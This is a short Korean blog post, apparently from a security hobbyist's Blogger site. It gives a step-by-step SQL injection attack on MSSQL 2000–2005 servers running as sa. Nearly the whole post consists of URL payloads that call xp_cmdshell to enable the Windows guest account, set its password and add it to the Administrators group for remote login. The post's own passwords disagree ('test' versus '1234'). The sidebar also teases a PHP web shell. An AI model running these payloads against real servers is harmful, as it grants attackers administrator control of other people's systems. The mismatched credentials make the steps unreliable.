# 취약점 적용 대상
- 데이터베이스 운영자가 MSSQL 서버를 sa 계정으로 운영하는 경우,
- MSSQL Server 2000, 2003, 2005
1. http://victim.com/research?name=';EXEC xp_cmdshell 'net user guest /active:yes'--
--> guest 계정 활성화
2. http://victim.com/research?name=';EXEC xp_cmdshell 'net user guest test'--
--> guest 계정 password를 test로 변경
3. http://victim.com/research?name=';EXEC xp_cmdshell 'net localgroup Administrator guest /add'--
// 관리자 그룹에 guest 추가
4. 원격 터미널을 통해 guest/1234 로그인
Popular Posts
-
/* PHP Version URL CMD WebShell */ /* 사용법 : hxxp://URL/cmd.php?cmd=명령어 */ <? echo " <FORM ACTIO...
-
프록시 도구를 이용하여 서버에 OPTIONS 메소드를 전달하면 지원하는 메소드를 확인 할 수 있다. 그런데 간혹 버프 OPTIONS 메소드로는 확인되지 않는데 response 헤더값에 allowed method 라고 표시되는 경우가 있다. 때문에 보...
Recent Posts
Powered by Blogger.